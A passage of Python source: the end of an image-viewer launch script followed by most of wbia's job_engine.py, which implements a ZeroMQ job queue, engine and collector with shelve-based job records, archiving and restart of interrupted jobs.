int(sys.argv[5]) ids = [] for label_set in (sys.argv[6:len(sys.argv)]): primary_id = [] secondary_ids = [] split_str = re.split(":", label_set) primary_id = [int(split_str[0])] if split_str[1] != "": secondary_ids = [int(label) for label in re.split(',', split_str[1])] ids += [primary_id + secondary_ids] extr = extractor.Extractor(display_queue, directory, ids, location, max_x, max_y, 0) viewer = Viewer(location, display_queue, directory, max_x, max_y) viewer.extractor_dict[ids[0][0]] = extr handler = handler.Input_Handler(display_queue) viewer.set_dimensions(extr.rows, extr.columns, extr.layers, extr.w) viewer.label_dict[0] = ids[0][0] extracting_worker = threading.Thread(target = extr.run, name = "extr") input_worker = threading.Thread(target = handler.run, name = "input_worker") input_worker.daemon =True extracting_worker.daemon = True extracting_worker.start() input_worker.start() viewer.main()
job_engine.py
# -*- coding: utf-8 -*- """ Accepts and handles requests for tasks. Each of the following runs in its own Thread/Process. BASICALLY DO A CLIENT/SERVER TO SPAWN PROCESSES AND THEN A PUBLISH SUBSCRIBE TO RETURN DATA Accepter: Receives tasks and requests Delegates tasks and responds to requests Tasks are delgated to an engine Engine: the engine accepts requests. the engine immediately responds WHERE it will be ready. the engine sends a message to the collector saying that something will be ready. the engine then executes a task. The engine is given direct access to the data. Collector: The collector accepts requests The collector can respond: * <ResultContent> * Results are ready. * Results are not ready. * Unknown jobid. * Error computing results. * Progress percent. References: Simple task farm, with routed replies in pyzmq http://stackoverflow.com/questions/7809200/implementing-task-farm-messaging-pattern-with-zeromq https://gist.github.com/minrk/1358832 Notes: We are essentially goint to be spawning two processes. We can test these simultaniously using python -m wbia.web.job_engine job_engine_tester We can test these separately by first starting the background server python -m wbia.web.job_engine job_engine_tester --bg Alternative: python -m wbia.web.job_engine job_engine_tester --bg --no-engine python -m wbia.web.job_engine job_engine_tester --bg --only-engine --fg-engine And then running the forground process python -m wbia.web.job_engine job_engine_tester --fg """ # if False: # import os # os.environ['UTOOL_NOCNN'] = 'True' # import logging import utool as ut import time import zmq import uuid # NOQA import numpy as np import shelve import random from datetime import datetime, timedelta import pytz import flask from os.path import join, exists, abspath, splitext, basename from functools import partial from wbia.control import controller_inject import multiprocessing print, rrr, profile = ut.inject2(__name__) # NOQA # logger = logging.getLogger('wbia') CLASS_INJECT_KEY, register_ibs_method = controller_inject.make_ibs_register_decorator( __name__ ) register_api = controller_inject.get_wbia_flask_api(__name__) ctx = zmq.Context.instance() # FIXME: needs to use correct number of ports URL = 'tcp://127.0.0.1' NUM_DEFAULT_ENGINES = ut.get_argval('--engine-lane-workers', int, 2) NUM_SLOW_ENGINES = ut.get_argval('--engine-slow-lane-workers', int, NUM_DEFAULT_ENGINES) NUM_FAST_ENGINES = ut.get_argval('--engine-fast-lane-workers', int, NUM_DEFAULT_ENGINES) NUM_ENGINES = { 'slow': NUM_SLOW_ENGINES, 'fast': NUM_FAST_ENGINES, } # VERBOSE_JOBS = ( # ut.get_argflag('--bg') or ut.get_argflag('--fg') or ut.get_argflag('--verbose-jobs') # ) VERBOSE_JOBS = False GLOBAL_SHELVE_LOCK = multiprocessing.Lock() TIMESTAMP_FMTSTR = '%Y-%m-%d %H:%M:%S %Z' TIMESTAMP_TIMEZONE = 'US/Pacific' JOB_STATUS_CACHE = {} def update_proctitle(procname, dbname=None): try: import setproctitle print('CHANGING PROCESS TITLE') old_title = setproctitle.getproctitle() print('old_title = %r' % (old_title,)) hostname = ut.get_computer_name() new_title = 'WBIA_%s_%s_%s' % (dbname, hostname, procname) print('new_title = %r' % (new_title,)) setproctitle.setproctitle(new_title) except ImportError: print('pip install setproctitle') def _get_engine_job_paths(ibs): shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) record_filepath_list = list(ut.iglob(join(shelve_path, '*.pkl'))) return record_filepath_list def _get_engine_lock_paths(ibs): shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) lock_filepath_list = list(ut.iglob(join(shelve_path, '*.lock'))) return lock_filepath_list @register_ibs_method def retry_job(ibs, jobid): shelve_path = ibs.get_shelves_path() job_record_filename = '%s.pkl' % (jobid,) job_record_filepath = join(shelve_path, job_record_filename) assert exists(job_record_filepath) job_record = ut.load_cPkl(job_record_filepath) job_action = job_record['request']['action'] job_args = job_record['request']['args'] job_kwargs = job_record['request']['kwargs'] job_func = getattr(ibs, job_action, None) if job_func is not None: job_result = job_func(*job_args, **job_kwargs) return job_action, job_func, job_args, job_kwargs, job_result @register_ibs_method def initialize_job_manager(ibs): """ Starts a background zmq job engine. Initializes a zmq object in this thread that can talk to the background processes. Run from the webserver CommandLine: python -m wbia.web.job_engine --exec-initialize_job_manager:0 Example: >>> # DISABLE_DOCTEST >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> ibs = wbia.opendb(defaultdb='testdb1') >>> from wbia.web import apis_engine >>> from wbia.web import job_engine >>> ibs.load_plugin_module(job_engine) >>> ibs.load_plugin_module(apis_engine) >>> ibs.initialize_job_manager() >>> print('Initializqation success. Now closing') >>> ibs.close_job_manager() >>> print('Closing success.') """ ibs.job_manager = ut.DynStruct() use_static_ports = False if ut.get_argflag('--web-deterministic-ports'): use_static_ports = True if ut.get_argflag('--fg'): ibs.job_manager.reciever = JobBackend(use_static_ports=True) else: ibs.job_manager.reciever = JobBackend(use_static_ports=use_static_ports) ibs.job_manager.reciever.initialize_background_processes( dbdir=ibs.get_dbdir(), containerized=ibs.containerized ) # Delete any leftover locks from before lock_filepath_list = _get_engine_lock_paths(ibs) print('Deleting %d leftover engine locks' % (len(lock_filepath_list),)) for lock_filepath in lock_filepath_list: ut.delete(lock_filepath) ibs.job_manager.jobiface = JobInterface( 0, ibs.job_manager.reciever.port_dict, ibs=ibs ) ibs.job_manager.jobiface.initialize_client_thread() # Wait until the collector becomes live while 0 and True: result = ibs.get_job_status(-1) print('result = %r' % (result,)) if result['status'] == 'ok': break ibs.job_manager.jobiface.queue_interrupted_jobs() # import wbia # #dbdir = '/media/raid/work/testdb1' # from wbia.web import app # web_port = ibs.get_web_port_via_scan() # if web_port is None: # raise ValueError('IA web server is not running on any expected port') # proc = ut.spawn_background_process(app.start_from_wbia, ibs, port=web_port) @register_ibs_method def close_job_manager(ibs): # if hasattr(ibs, 'job_manager') and ibs.job_manager is not None: # pass del ibs.job_manager.reciever del ibs.job_manager.jobiface ibs.job_manager = None @register_ibs_method @register_api('/api/engine/job/', methods=['GET', 'POST'], __api_plural_check__=False) def get_job_id_list(ibs): """ Web call that returns the list of job ids CommandLine: # Run Everything together python -m wbia.web.job_engine --exec-get_job_status # Start job queue in its own process python -m wbia.web.job_engine job_engine_tester --bg # Start web server in its own process ./main.py --web --fg pass # Run foreground process python -m wbia.web.job_engine --exec-get_job_status:0 --fg Example: >>> # xdoctest: +REQUIRES(--web-tests) >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> with wbia.opendb_bg_web('testdb1', managed=True) as web_ibs: # , domain='http://52.33.105.88') ... # Test get status of a job id that does not exist ... response = web_ibs.send_wbia_request('/api/engine/job/', jobid='badjob') """ status = ibs.job_manager.jobiface.get_job_id_list() jobid_list = status['jobid_list'] return jobid_list @register_ibs_method @register_api( '/api/engine/process/status/', methods=['GET', 'POST'], __api_plural_check__=False ) def get_process_alive_status(ibs): status_dict = ibs.job_manager.reciever.get_process_alive_status() print('status_dict = %r' % (status_dict,)) return status_dict @register_ibs_method @register_api( '/api/engine/job/status/', methods=['GET', 'POST'], __api_plural_check__=False ) def get_job_status(ibs, jobid=None): """ Web call that returns the status of a job Returns one of: received - job has been received, but not ingested yet accepted - job has been accepted (validated) queued - job has been transferred to the engine queue working - job is being worked on by the engine publishing - job is done on the engine, pushing results to collector completed | exception - job is complete or has an error CommandLine: # Run Everything together python -m wbia.web.job_engine --exec-get_job_status # Start job queue in its own process python -m wbia.web.job_engine job_engine_tester --bg # Start web server in its own process ./main.py --web --fg pass # Run foreground process python -m wbia.web.job_engine --exec-get_job_status:0 --fg Example: >>> # xdoctest: +REQUIRES(--web-tests) >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> with wbia.opendb_bg_web('testdb1', managed=True) as web_ibs: # , domain='http://52.33.105.88') ... # Test get status of a job id that does not exist ... response = web_ibs.send_wbia_request('/api/engine/job/status/', jobid='badjob') """ if jobid is None: status = ibs.job_manager.jobiface.get_job_status_dict() else: status = ibs.job_manager.jobiface.get_job_status(jobid) return status # @register_ibs_method # @register_api('/api/engine/job/terminate/', methods=['GET', 'POST']) # def send_job_terminate(ibs, jobid): # """ # Web call that terminates a job # """ # success = ibs.job_manager.jobiface.terminate_job(jobid) # return success @register_ibs_method @register_api( '/api/engine/job/metadata/', methods=['GET', 'POST'], __api_plural_check__=False ) def get_job_metadata(ibs, jobid): """ Web call that returns the metadata of a job CommandLine: # Run Everything together python -m wbia.web.job_engine --exec-get_job_metadata # Start job queue in its own process python -m wbia.web.job_engine job_engine_tester --bg # Start web server in its own process ./main.py --web --fg pass # Run foreground process python -m wbia.web.job_engine --exec-get_job_metadata:0 --fg Example: >>> # xdoctest: +REQUIRES(--web-tests) >>> # xdoctest: +REQUIRES(--slow) >>> # xdoctest: +REQUIRES(--job-engine-tests) >>> # xdoctest: +REQUIRES(--web-tests) >>> from wbia.web.job_engine import * # NOQA >>> import wbia >>> with wbia.opendb_bg_web('testdb1', managed=True) as web_ibs: # , domain='http://52.33.105.88') ... # Test get metadata of a job id that does not exist ... response = web_ibs.send_wbia_request('/api/engine/job/metadata/', jobid='badjob') """ status = ibs.job_manager.jobiface.get_job_metadata(jobid) return status @register_ibs_method @register_api('/api/engine/job/result/', methods=['GET', 'POST']) def get_job_result(ibs, jobid): """ Web call that returns the result of a job """ result = ibs.job_manager.jobiface.get_job_result(jobid) return result @register_ibs_method @register_api('/api/engine/job/result/wait/', methods=['GET', 'POST']) def wait_for_job_result(ibs, jobid, timeout=10, freq=0.1): ibs.job_manager.jobiface.wait_for_job_result(jobid, timeout=timeout, freq=freq) result = ibs.job_manager.jobiface.get_unpacked_result(jobid) return result def _get_random_open_port(): port = random.randint(1024, 49151) while not ut.is_local_port_open(port): port = random.randint(1024, 49151) assert ut.is_local_port_open(port) return port def job_engine_tester(): """ CommandLine: python -m wbia.web.job_engine --exec-job_engine_tester python -b -m wbia.web.job_engine --exec-job_engine_tester python -m wbia.web.job_engine job_engine_tester python -m wbia.web.job_engine job_engine_tester --bg python -m wbia.web.job_engine job_engine_tester --fg Example: >>> # SCRIPT >>> from wbia.web.job_engine import * # NOQA >>> job_engine_tester() """ _init_signals() # now start a few clients, and fire off some requests client_id = np.random.randint(1000) reciever = JobBackend(use_static_ports=True) jobiface = JobInterface(client_id, reciever.port_dict) from wbia.init import sysres if ut.get_argflag('--bg'): dbdir = sysres.get_args_dbdir( defaultdb='cache', allow_newdir=False, db=None, dbdir=None ) reciever.initialize_background_processes(dbdir) print('[testzmq] parent process is looping forever') while True: time.sleep(1) elif ut.get_argflag('--fg'): jobiface.initialize_client_thread() else: dbdir = sysres.get_args_dbdir( defaultdb='cache', allow_newdir=False, db=None, dbdir=None ) reciever.initialize_background_processes(dbdir) jobiface.initialize_client_thread() # Foreground test script print('... waiting for jobs') if ut.get_argflag('--cmd'): ut.embed() # jobiface.queue_job() else: print('[test] ... emit test1') callback_url = None callback_method = None args = (1,) jobid1 = jobiface.queue_job('helloworld', callback_url, callback_method, *args) jobiface.wait_for_job_result(jobid1) jobid_list = [] args = ([1], [3, 4, 5]) kwargs = dict(cfgdict={'K': 1}) identify_jobid = jobiface.queue_job( 'query_chips_simple_dict', callback_url, callback_method, *args, **kwargs ) for jobid in jobid_list: jobiface.wait_for_job_result(jobid) jobiface.wait_for_job_result(identify_jobid) print('FINISHED TEST SCRIPT') def spawn_background_process(func, *args, **kwargs): import utool as ut func_name = ut.get_funcname(func) name = 'job-engine.Progress-' + func_name proc_obj = multiprocessing.Process(target=func, name=name, args=args, kwargs=kwargs) proc_obj.daemon = True proc_obj.start() return proc_obj class JobBackend(object): def __init__(self, **kwargs): # self.num_engines = 3 self.engine_queue_proc = None self.engine_lanes = ['fast', 'slow'] self.engine_lanes = [lane.lower() for lane in self.engine_lanes] assert 'slow' in self.engine_lanes self.num_engines = {lane: NUM_ENGINES[lane] for lane in self.engine_lanes} self.engine_procs = None self.collect_queue_proc = None self.collect_proc = None # -- only_engine = ut.get_argflag('--only-engine') self.spawn_collector = not only_engine self.spawn_engine = not ut.get_argflag('--no-engine') self.fg_engine = ut.get_argflag('--fg-engine') self.spawn_queue = not only_engine # Find ports self.port_dict = None self._initialize_job_ports(**kwargs) print('JobBackend ports:') ut.print_dict(self.port_dict) def __del__(self): if VERBOSE_JOBS: print('Cleaning up job backend') if self.engine_procs is not None: for lane in self.engine_procs: for engine in self.engine_procs[lane]: try: engine.terminate() except Exception: pass if self.engine_queue_proc is not None: try: self.engine_queue_proc.terminate() except Exception: pass if self.collect_proc is not None: try: self.collect_proc.terminate() except Exception: pass if self.collect_queue_proc is not None: try: self.collect_queue_proc.terminate() except Exception: pass if VERBOSE_JOBS: print('Killed external procs') def _initialize_job_ports(self, use_static_ports=False, static_root=51381): # _portgen = functools.partial(next, itertools.count(51381)) key_list = [ 'collect_pull_url', 'collect_push_url', 'engine_pull_url', # 'engine_push_url', # 'collect_pushpull_url', ] for lane in self.engine_lanes: key_list.append('engine_%s_push_url' % (lane,)) # Get ports if use_static_ports: port_list = range(static_root, static_root + len(key_list)) else: port_list = [] while len(port_list) < len(key_list): port = _get_random_open_port() if port not in port_list: port_list.append(port) port_list = sorted(port_list) # Assign ports assert len(key_list) == len(port_list) self.port_dict = { key: '%s:%d' % (URL, port) for key, port in list(zip(key_list, port_list)) } def initialize_background_processes( self, dbdir=None, containerized=False, thread=False ): # if VERBOSE_JOBS: print('Initialize Background Processes') def _spawner(func, *args, **kwargs): # if thread: # _spawner_func_ = ut.spawn_background_daemon_thread # else: # _spawner_func_ = ut.spawn_background_process _spawner_func_ = spawn_background_process proc = _spawner_func_(func, *args, **kwargs) assert proc.is_alive(), 'proc (%s) died too soon' % (ut.get_funcname(func)) return proc if self.spawn_queue: self.engine_queue_proc = _spawner( engine_queue_loop, self.port_dict, self.engine_lanes ) self.collect_queue_proc = _spawner(collect_queue_loop, self.port_dict) if self.spawn_collector: self.collect_proc = _spawner( collector_loop, self.port_dict, dbdir, containerized ) if self.spawn_engine: if self.fg_engine: print('ENGINE IS IN DEBUG FOREGROUND MODE') # Spawn engine in foreground process assert self.num_engines == 1, 'fg engine only works with one engine' engine_loop(0, self.port_dict, dbdir) assert False, 'should never see this' else: # Normal case if self.engine_procs is None: self.engine_procs = {} for lane in self.engine_lanes: if lane not in self.engine_procs: self.engine_procs[lane] = [] for i in range(self.num_engines[lane]): proc = _spawner( engine_loop, i, self.port_dict, dbdir, containerized, lane ) self.engine_procs[lane].append(proc) # Check if online # wait for processes to spin up if self.spawn_queue: assert self.engine_queue_proc.is_alive(), 'engine died too soon' assert self.collect_queue_proc.is_alive(), 'collector queue died too soon' if self.spawn_collector: assert self.collect_proc.is_alive(), 'collector died too soon' if self.spawn_engine: for lane in self.engine_procs: for engine in self.engine_procs[lane]: assert engine.is_alive(), 'engine died too soon' def get_process_alive_status(self): status_dict = {} if self.spawn_queue: status_dict['engine_queue'] = self.engine_queue_proc.is_alive() status_dict['collect_queue'] = self.collect_queue_proc.is_alive() if self.spawn_collector: status_dict['collector'] = self.collect_proc.is_alive() if self.spawn_engine: for lane in self.engine_procs: for id_, engine in enumerate(self.engine_procs[lane]): engine_str = 'engine.%s.%s' % (lane, id_) status_dict[engine_str] = engine.is_alive() return status_dict def get_shelve_lock_filepath(shelve_filepath): shelve_lock_filepath = '%s.lock' % (shelve_filepath,) return shelve_lock_filepath def touch_shelve_lock_file(shelve_filepath): shelve_lock_filepath = get_shelve_lock_filepath(shelve_filepath) assert not exists(shelve_lock_filepath) ut.touch(shelve_lock_filepath, verbose=False) assert exists(shelve_lock_filepath) def delete_shelve_lock_file(shelve_filepath): shelve_lock_filepath = get_shelve_lock_filepath(shelve_filepath) assert exists(shelve_lock_filepath) ut.delete(shelve_lock_filepath, verbose=False) assert not exists(shelve_lock_filepath) def wait_for_shelve_lock_file(shelve_filepath, timeout=600): shelve_lock_filepath = get_shelve_lock_filepath(shelve_filepath) start_time = time.time() while exists(shelve_lock_filepath): current_time = time.time() elapsed = current_time - start_time if elapsed >= timeout: return False time.sleep(1) if int(elapsed) % 5 == 0: print('Waiting for %0.02f seconds for lock so far' % (elapsed,)) return True def get_shelve_value(shelve_filepath, key): wait_for_shelve_lock_file(shelve_filepath) with GLOBAL_SHELVE_LOCK: wait_for_shelve_lock_file(shelve_filepath) touch_shelve_lock_file(shelve_filepath) value = None try: with shelve.open(shelve_filepath, 'r') as shelf: value = shelf.get(key) except Exception: pass delete_shelve_lock_file(shelve_filepath) return value def set_shelve_value(shelve_filepath, key, value): wait_for_shelve_lock_file(shelve_filepath) with GLOBAL_SHELVE_LOCK: wait_for_shelve_lock_file(shelve_filepath) touch_shelve_lock_file(shelve_filepath) flag = False try: with shelve.open(shelve_filepath) as shelf: shelf[key] = value flag = True except Exception: pass delete_shelve_lock_file(shelve_filepath) return flag def get_shelve_filepaths(ibs, jobid): shelve_path = ibs.get_shelves_path() shelve_input_filepath = abspath(join(shelve_path, '%s.input.shelve' % (jobid,))) shelve_output_filepath = abspath(join(shelve_path, '%s.output.shelve' % (jobid,))) return shelve_input_filepath, shelve_output_filepath def initialize_process_record( record_filepath, shelve_input_filepath, shelve_output_filepath, shelve_path, shelve_archive_path, jobiface_id, ): MAX_ATTEMPTS = 20 ARCHIVE_DAYS = 14 timezone = pytz.timezone(TIMESTAMP_TIMEZONE) now = datetime.now(timezone) now = now.replace(microsecond=0) now = now.replace(second=0) now = now.replace(minute=0) now = now.replace(hour=0) archive_delta = timedelta(days=ARCHIVE_DAYS) archive_date = now - archive_delta archive_timestamp = archive_date.strftime(TIMESTAMP_FMTSTR) jobid = splitext(basename(record_filepath))[0] jobcounter = None # Load the engine record record = ut.load_cPkl(record_filepath, verbose=False) # Load the record info engine_request = record.get('request', None) attempts = record.get('attempts', 0) completed = record.get('completed', False) # Check status suppressed = attempts >= MAX_ATTEMPTS corrupted = engine_request is None # Load metadata metadata = get_shelve_value(shelve_input_filepath, 'metadata') if metadata is None: print('Missing metadata...corrupted') corrupted = True archived = False if not corrupted: jobcounter = metadata.get('jobcounter', None) times = metadata.get('times', {}) if jobcounter is None: print('Missing jobcounter...corrupted') corrupted = True job_age = None if not corrupted and completed: completed_timestamp = times.get('completed', None) if completed_timestamp is not None: try: archive_elapsed = calculate_timedelta( completed_timestamp, archive_timestamp ) job_age = archive_elapsed[-1] archived = job_age > 0 except Exception: args = ( completed_timestamp, archive_timestamp, ) print( '[job_engine] Could not determine archive status!\n\tCompleted: %r\n\tArchive: %r' % args ) if archived: with ut.Indenter('[client %d] ' % (jobiface_id)): color = 'brightmagenta' print_ = partial(ut.colorprint, color=color) print_('ARCHIVING JOB (AGE: %d SECONDS)' % (job_age,)) job_scr_filepath_list = list( ut.iglob(join(shelve_path, '%s*' % (jobid,))) ) for job_scr_filepath in job_scr_filepath_list: job_dst_filepath = job_scr_filepath.replace( shelve_path, shelve_archive_path ) ut.copy( job_scr_filepath, job_dst_filepath, overwrite=True ) # ut.copy allows for overwrite, ut.move does not ut.delete(job_scr_filepath) if archived: # We have archived the job, don't bother registering it engine_request = None else: if completed or suppressed or corrupted: # Register the job, pass the jobcounter and jobid only engine_request = None else: # We have a pending job, restart with the original request with ut.Indenter('[client %d] ' % (jobiface_id)): color = 'brightblue' if attempts == 0 else 'brightred' print_ = partial(ut.colorprint, color=color) print_( 'RESTARTING FAILED JOB FROM RESTART (ATTEMPT %d)' % (attempts + 1,) ) print_(ut.repr3(record_filepath)) # print_(ut.repr3(record)) times = metadata.get('times', {}) received = times['received'] engine_request['restart_jobid'] = jobid engine_request['restart_jobcounter'] = jobcounter engine_request['restart_received'] = received record['attempts'] = attempts + 1 ut.save_cPkl(record_filepath, record, verbose=False) values = jobcounter, jobid, engine_request, archived, completed, suppressed, corrupted return values class JobInterface(object): def __init__(jobiface, id_, port_dict, ibs=None): jobiface.id_ = id_ jobiface.ibs = ibs jobiface.verbose = 2 if VERBOSE_JOBS else 1 jobiface.port_dict = port_dict print('JobInterface ports:') ut.print_dict(jobiface.port_dict) def __del__(jobiface): if VERBOSE_JOBS: print('Cleaning up job frontend') if jobiface.engine_recieve_socket is not None: jobiface.engine_recieve_socket.disconnect( jobiface.port_dict['engine_pull_url'] ) jobiface.engine_recieve_socket.close() if jobiface.collect_recieve_socket is not None: jobiface.collect_recieve_socket.disconnect( jobiface.port_dict['collect_pull_url'] ) jobiface.collect_recieve_socket.close() # def init(jobiface): # # Starts several new processes # jobiface.initialize_background_processes() # # Does not create a new process, but connects sockets on this process # jobiface.initialize_client_thread() def initialize_client_thread(jobiface): """ Creates a ZMQ object in this thread. This talks to background processes. """ if jobiface.verbose: print('Initializing JobInterface') jobiface.engine_recieve_socket = ctx.socket(zmq.DEALER) # CHECK2 - REQ jobiface.engine_recieve_socket.setsockopt_string( zmq.IDENTITY, 'client%s.engine.DEALER' % (jobiface.id_,) ) jobiface.engine_recieve_socket.connect(jobiface.port_dict['engine_pull_url']) if jobiface.verbose: print( 'connect engine_pull_url = %r' % (jobiface.port_dict['engine_pull_url'],) ) jobiface.collect_recieve_socket = ctx.socket(zmq.DEALER) # CHECK2 - REQ jobiface.collect_recieve_socket.setsockopt_string( zmq.IDENTITY, 'client%s.collect.DEALER' % (jobiface.id_,) ) jobiface.collect_recieve_socket.connect(jobiface.port_dict['collect_pull_url']) if jobiface.verbose: print( 'connect collect_pull_url = %r' % (jobiface.port_dict['collect_pull_url'],) ) def queue_interrupted_jobs(jobiface): import tqdm ibs = jobiface.ibs if ibs is not None: shelve_path = ibs.get_shelves_path() shelve_path = shelve_path.rstrip('/') shelve_archive_path = '%s_ARCHIVE' % (shelve_path,) ut.ensuredir(shelve_archive_path) record_filepath_list = _get_engine_job_paths(ibs) num_records = len(record_filepath_list) print('Reloading %d engine jobs...' % (num_records,)) shelve_input_filepath_list = [] shelve_output_filepath_list = [] for record_filepath in record_filepath_list: jobid = splitext(basename(record_filepath))[0] shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths( ibs, jobid ) shelve_input_filepath_list.append(shelve_input_filepath) shelve_output_filepath_list.append(shelve_output_filepath) arg_iter = list( zip( record_filepath_list, shelve_input_filepath_list, shelve_output_filepath_list, [shelve_path] * num_records, [shelve_archive_path] * num_records, [jobiface.id_] * num_records, ) ) if len(arg_iter) > 0: values_list = ut.util_parallel.generate2( initialize_process_record, arg_iter ) values_list = list(values_list) else: values_list = [] print('Processed %d records' % (len(values_list),)) restart_jobcounter_list = [] restart_jobid_list = [] restart_request_list = [] global_jobcounter = 0 num_registered, num_restarted = 0, 0 num_completed, num_archived, num_suppressed, num_corrupted = 0, 0, 0, 0 for values in tqdm.tqdm(values_list): ( jobcounter, jobid, engine_request, archived, completed, suppressed, corrupted, ) = values if archived: assert engine_request is None num_archived += 1 continue if jobcounter is not None: global_jobcounter = max(global_jobcounter, jobcounter) if engine_request is None: assert not archived if completed: status = 'completed' num_completed += 1 elif suppressed: status = 'suppressed' num_suppressed += 1 else: status = 'corrupted' num_corrupted += 1 reply_notify = { 'jobid': jobid, 'status': status, 'action': 'register', } print('Sending register: %r' % (reply_notify,)) jobiface.collect_recieve_socket.send_json(reply_notify) reply = jobiface.collect_recieve_socket.recv_json() jobid_ = reply['jobid'] assert jobid_ == jobid else: num_restarted += 1 restart_jobcounter_list.append(jobcounter) restart_jobid_list.append(jobid) restart_request_list.append(engine_request) num_registered += 1 assert num_restarted == len(restart_jobcounter_list) print('Registered %d jobs...' % (num_registered,)) print('\t %d completed jobs' % (num_completed,)) print('\t %d restarted jobs' % (num_restarted,)) print('\t %d suppressed jobs' % (num_suppressed,)) print('\t %d corrupted jobs' % (num_corrupted,)) print('Archived %d jobs...' % (num_archived,)) # Update the jobcounter to be up to date update_notify = { '__set_jobcounter__': global_jobcounter, } print('Updating completed job counter: %r' % (update_notify,)) jobiface.engine_recieve_socket.send_json(update_notify) reply = jobiface.engine_recieve_socket.recv_json() jobcounter_ = reply['jobcounter'] assert jobcounter_ == global_jobcounter print('Re-sending %d engine jobs...' % (len(restart_jobcounter_list),)) index_list = np.argsort(restart_jobcounter_list) zipped = list( zip(restart_jobcounter_list, restart_jobid_list, restart_request_list) ) zipped = ut.take(zipped, index_list) for jobcounter, jobid, engine_request in tqdm.tqdm(zipped): jobiface.engine_recieve_socket.send_json(engine_request) reply = jobiface.engine_recieve_socket.recv_json() jobcounter_ = reply['jobcounter'] jobid_ = reply['jobid'] assert jobcounter_ == jobcounter assert jobid_ == jobid def queue_job( jobiface, action, callback_url=None, callback_method=None, lane='slow', *args, **kwargs ): r""" IBEIS: This is just a function that lives in the main thread and ships off a job. FIXME: I do not like having callback_url and callback_method specified like this with args and kwargs. If these must be there then they should be specified first, or THE PREFERED OPTION IS args and kwargs should not be specified without the * syntax The client - sends messages, and receives replies after they have been processed by the """ # NAME: job_client with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') request = {} try: if flask.request: request = { 'endpoint': flask.request.path, 'function': flask.request.endpoint, 'input': flask.request.processed, } except RuntimeError: pass engine_request = { 'action': action, 'args': args, 'kwargs': kwargs, 'callback_url': callback_url, 'callback_method': callback_method, 'request': request, 'restart_jobid': None, 'restart_jobcounter': None, 'restart_received': None, 'lane': lane, } if jobiface.verbose >= 2: print('Queue job: %s' % (ut.repr2(engine_request, truncate=True),)) # Send request to job jobiface.engine_recieve_socket.send_json(engine_request) reply_notify = jobiface.engine_recieve_socket.recv_json() print('reply_notify = %r' % (reply_notify,)) jobid = reply_notify['jobid'] ibs = jobiface.ibs if ibs is not None: shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) record_filename = '%s.pkl' % (jobid,) record_filepath = join(shelve_path, record_filename) record = { 'request': engine_request, 'attempts': 0, 'completed': False, } ut.save_cPkl(record_filepath, record, verbose=False) # Release memor action = None args = None kwargs = None callback_url = None callback_method = None request = None engine_request = None return jobid def get_job_id_list(jobiface): with ut.Indenter('[client %d] ' % (jobiface.id_)): if False: # jobiface.verbose >= 1: print('----') print('Request list of job ids') pair_msg = dict(action='job_id_list') # CALLS: collector_request_status jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_status(jobiface, jobid): with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') print('Request status of jobid=%r' % (jobid,)) pair_msg = dict(action='job_status', jobid=jobid) # CALLS: collector_request_status jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_status_dict(jobiface): with ut.Indenter('[client %d] ' % (jobiface.id_)): if False: # jobiface.verbose >= 1: print('----') print('Request list of job ids') pair_msg = dict(action='job_status_dict') # CALLS: collector_request_status jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_metadata(jobiface, jobid): with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') print('Request metadata of jobid=%r' % (jobid,)) pair_msg = dict(action='job_input', jobid=jobid) # CALLS: collector_request_metadata jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_job_result(jobiface, jobid): with ut.Indenter('[client %d] ' % (jobiface.id_)): if jobiface.verbose >= 1: print('----') print('Request result of jobid=%r' % (jobid,)) pair_msg = dict(action='job_result', jobid=jobid) # CALLER: collector_request_result jobiface.collect_recieve_socket.send_json(pair_msg) reply = jobiface.collect_recieve_socket.recv_json() return reply def get_unpacked_result(jobiface, jobid): reply = jobiface.get_job_result(jobid) json_result = reply['json_result'] try: result = ut.from_json(json_result) except TypeError as ex: ut.printex(ex, keys=['json_result'], iswarning=True) result = json_result except Exception as ex: ut.printex(ex, 'Failed to unpack result', keys=['json_result']) result = reply['json_result'] # Release raw JSON result json_result = None return result def wait_for_job_result(jobiface, jobid, timeout=10, freq=0.1): t = ut.Timer(verbose=False) t.tic() while True: reply = jobiface.get_job_status(jobid) if reply['jobstatus'] == 'completed': return elif reply['jobstatus'] == 'exception': result = jobiface.get_unpacked_result(jobid) # raise Exception(result) print('Exception occured in engine') return result elif reply['jobstatus'] == 'working': pass elif reply['jobstatus'] == 'unknown': pass else: raise Exception('Unknown jobstatus=%r' % (reply['jobstatus'],)) reply = None # Release memory time.sleep(freq) if timeout is not None and t.toc() > timeout: raise Exception('Timeout') def collect_queue_loop(port_dict): name = 'collect' assert name is not None, 'must name queue' queue_name = name + '_queue' loop_name = queue_name + '_loop' update_proctitle(queue_name) interface_pull = port_dict['%s_pull_url' % (name,)] interface_push = port_dict['%s_push_url' % (name,)] with ut.Indenter('[%s] ' % (queue_name,)): if VERBOSE_JOBS: print('Init make_queue_loop: name=%r' % (name,)) # bind the client dealer to the queue router recieve_socket = ctx.socket(zmq.ROUTER) # CHECKED - ROUTER recieve_socket.setsockopt_string(zmq.IDENTITY, 'queue.' + name + '.' + 'ROUTER') recieve_socket.bind(interface_pull) if VERBOSE_JOBS: print('bind %s_url1 = %r' % (name, interface_pull)) # bind the server router to the queue dealer send_socket = ctx.socket(zmq.DEALER) # CHECKED - DEALER send_socket.setsockopt_string(zmq.IDENTITY, 'queue.' + name + '.' + 'DEALER') send_socket.bind(interface_push) if VERBOSE_JOBS: print('bind 